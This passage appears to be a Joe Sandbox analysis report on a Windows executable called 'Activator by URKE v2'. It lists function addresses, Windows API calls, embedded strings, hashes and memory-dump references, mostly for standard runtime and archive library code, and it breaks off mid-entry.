                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                                                                                                                                                                                                                  • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                                                                                                  • API String ID: 2868844859-1533471033
                                                                                                                                                                                                                                                  • Opcode ID: f0895581c817e55a58f121f9c0f6f66dd55f3ddbc4a2fb8a2d625ca181ef1552
                                                                                                                                                                                                                                                  • Instruction ID: 6e994d56211249263d3a033c9e5154cf43360ec80d016601a2ad670de76cd525
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0895581c817e55a58f121f9c0f6f66dd55f3ddbc4a2fb8a2d625ca181ef1552
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A81D062F08A0A85EB00FB61D5603EDB332AF44B98F844137DE5D976DAEE38D506C361
                                                                                                                                                                                                                                                  Function 00007FF7E5F21B60 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                                                  • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                                                  • Opcode ID: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
                                                                                                                                                                                                                                                  • Instruction ID: 1b81653ff26436e06a8e2998facf950ff7f0eb46e6e8498f301990e144cf4935
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D141EEBAB19B4889E700DF21E861BED73A4EB09B98F804136EE4C87B55DE3CD425C345
                                                                                                                                                                                                                                                  Function 00007FF7E5F12EE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                                                                                                                                                                                  • String ID: STATIC
                                                                                                                                                                                                                                                  • API String ID: 2845197485-1882779555
                                                                                                                                                                                                                                                  • Opcode ID: a56abbe028ef3f0b7d15def6da20f662c50af87d749574eaec9b76d17f79dad6
                                                                                                                                                                                                                                                  • Instruction ID: 459dc75fa1e5f3916fad1d1e417289631416a59a4da2cadb0e1e580d168c586e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a56abbe028ef3f0b7d15def6da20f662c50af87d749574eaec9b76d17f79dad6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B31E76570864A46FA10BB12E9307F9E391BB89FC4FC40032DD4D87795DE3CE9068712
                                                                                                                                                                                                                                                  Function 00007FF7E5EF80B0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 444COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: UNC$\\?\
                                                                                                                                                                                                                                                  • API String ID: 4097890229-253988292
                                                                                                                                                                                                                                                  • Opcode ID: 627c07d53eccfe150ff9c499ac3b11f54613392915993c7d05f5251deab33fae
                                                                                                                                                                                                                                                  • Instruction ID: aa1b7024746893bebe16ea0ffc8bdf7ebaacf69f1c7452d5253566460d3fcf69
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 627c07d53eccfe150ff9c499ac3b11f54613392915993c7d05f5251deab33fae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4212E422B0C74A80EB10EB65D1602ADA371EB41F88FD00233DA9D9BAE5DF3CD555C3A1
                                                                                                                                                                                                                                                  Function 00007FF7E5F0E9E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ItemTextWindow
                                                                                                                                                                                                                                                  • String ID: LICENSEDLG
                                                                                                                                                                                                                                                  • API String ID: 2478532303-2177901306
                                                                                                                                                                                                                                                  • Opcode ID: 413809c6c529f907a05a51e37b96b30026af9f7a13d4bd8aebdb5ec3f6628f42
                                                                                                                                                                                                                                                  • Instruction ID: 963047f1a52fe4d1adabd2c9681cc900f8c07a67ef38640987d6917c2b84c342
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 413809c6c529f907a05a51e37b96b30026af9f7a13d4bd8aebdb5ec3f6628f42
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6541C865A0865A82FB14BB11E8747F9A750BF88F84FC40133DA0DC7B95CF3CAA458722
                                                                                                                                                                                                                                                  Function 00007FF7E5EFBD30 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                                                                                                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                                  • API String ID: 2915667086-2207617598
                                                                                                                                                                                                                                                  • Opcode ID: df634e7e6220f0fab9136f3d9598b6958fd483239d44fb29bf155b66aa12a787
                                                                                                                                                                                                                                                  • Instruction ID: 43419754f935fe5d3db296b397f1c36688603a4984832c7a40c48ae15d109905
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df634e7e6220f0fab9136f3d9598b6958fd483239d44fb29bf155b66aa12a787
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3313D64B09A4F81EA14AB11AA706B4A769AF44F90BC44137CD9E8B7A4DE3CE4518333
                                                                                                                                                                                                                                                  Function 00007FF7E5F0C414 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID: $
                                                                                                                                                                                                                                                  • API String ID: 3668304517-227171996
                                                                                                                                                                                                                                                  • Opcode ID: 326bda648bab62f9521e8a52d1ba83c083d92ece9a6de57467eaaf06b80d2905
                                                                                                                                                                                                                                                  • Instruction ID: 1d51b206f0afa08de3e6eaf9791707541a450ecc3b7a313b507325fa02587d75
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 326bda648bab62f9521e8a52d1ba83c083d92ece9a6de57467eaaf06b80d2905
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3F1D062F1474A80EE00AB65D1A42FCE362AB44F98FC85632CB5D976D5DF7CE0908366
                                                                                                                                                                                                                                                  Function 00007FF7E5F18D7C Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                  • API String ID: 2940173790-393685449
                                                                                                                                                                                                                                                  • Opcode ID: 7ce8224d02cbc9d10e697210102f736983d510ff4da2607681883173542701a8
                                                                                                                                                                                                                                                  • Instruction ID: 4ae8cde584fcdc2e865f6c9f152f63303abc6a23f723753968fcdc31e153775a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ce8224d02cbc9d10e697210102f736983d510ff4da2607681883173542701a8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85E1B1729087898AE710AF34D6A03EDB7A0FB55B48F940137DA8D97697CF38E481C752
                                                                                                                                                                                                                                                  Function 00007FF7E5F01BF4 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 160COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F00AA0: CompareStringW.KERNEL32(?,?,00007FF7E5EF6C19), ref: 00007FF7E5F00ABF
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF12BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E5EF13B6
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F00AD0: CompareStringW.KERNEL32 ref: 00007FF7E5F00B36
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5F01DC2
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5F01DC8
                                                                                                                                                                                                                                                  • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E5F01E25
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskswprintf
                                                                                                                                                                                                                                                  • String ID: .zipx$.zx$z%s%02d
                                                                                                                                                                                                                                                  • API String ID: 2859674139-515631857
                                                                                                                                                                                                                                                  • Opcode ID: 4b60fe0a4260c981502afa51fbfce4c695209fcfdf906febb7fa7c3ab58db49e
                                                                                                                                                                                                                                                  • Instruction ID: add107ad7981d3ff9bbcdc0f129c196f568b9b43e9af80cb1553f6a4ab08d007
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b60fe0a4260c981502afa51fbfce4c695209fcfdf906febb7fa7c3ab58db49e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A271D772A15B4994EB10EF64D4A03ED7361EF84B88FC05233EA5C87A99DF38D155C311
                                                                                                                                                                                                                                                  Function 00007FF7E5F1A87C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7E5F1AA83,?,?,?,00007FF7E5F187EE,?,?,?,00007FF7E5F187A9), ref: 00007FF7E5F1A901
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00007FF7E5F1AA83,?,?,?,00007FF7E5F187EE,?,?,?,00007FF7E5F187A9), ref: 00007FF7E5F1A90F
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7E5F1AA83,?,?,?,00007FF7E5F187EE,?,?,?,00007FF7E5F187A9), ref: 00007FF7E5F1A939
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00007FF7E5F1AA83,?,?,?,00007FF7E5F187EE,?,?,?,00007FF7E5F187A9), ref: 00007FF7E5F1A97F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,00007FF7E5F1AA83,?,?,?,00007FF7E5F187EE,?,?,?,00007FF7E5F187A9), ref: 00007FF7E5F1A98B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                  • Opcode ID: 6c79a96e063dba16a1b32c7952d051ebac3d8e1187371194647d3fb8a0e2c012
                                                                                                                                                                                                                                                  • Instruction ID: 60edd93ef0d1697495e1477bdfffc7be2ab59a4a4ed9d808b9015d50c9042a32
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c79a96e063dba16a1b32c7952d051ebac3d8e1187371194647d3fb8a0e2c012
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC31EA61A1A64981EE11AB0299207F9B395BF44F60FDA0537DD5EC7385EF3CE4848362
                                                                                                                                                                                                                                                  Function 00007FF7E5F15094 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,00007FF7E5F15003,?,?,?,00007FF7E5F153BA), ref: 00007FF7E5F150BB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7E5F15003,?,?,?,00007FF7E5F153BA), ref: 00007FF7E5F150D8
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7E5F15003,?,?,?,00007FF7E5F153BA), ref: 00007FF7E5F150F4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                                                                  • API String ID: 667068680-1718035505
                                                                                                                                                                                                                                                  • Opcode ID: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
                                                                                                                                                                                                                                                  • Instruction ID: 1f032b926fa9c084e1f4f2c9d44bbf0896321a417bd96ec9ce19644dbb95e1ff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9113064A0DB0B81FD52BB11AA603F4D2915F08F42FD81937C80DC6755EE3CB4548A62
                                                                                                                                                                                                                                                  Function 00007FF7E5F19278 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                  • API String ID: 2889003569-2084237596
                                                                                                                                                                                                                                                  • Opcode ID: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
                                                                                                                                                                                                                                                  • Instruction ID: 733db3747d7cfc0b75b0565210eba8f6668dc91b9e1e01903fb21e7a282ec4ab
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B391F273A087898AE710DB64EA903EDBBA0F744B88F50413AEE4D97B56DF38D191C741
                                                                                                                                                                                                                                                  Function 00007FF7E5F183FC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm$f
                                                                                                                                                                                                                                                  • API String ID: 2395640692-629598281
                                                                                                                                                                                                                                                  • Opcode ID: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
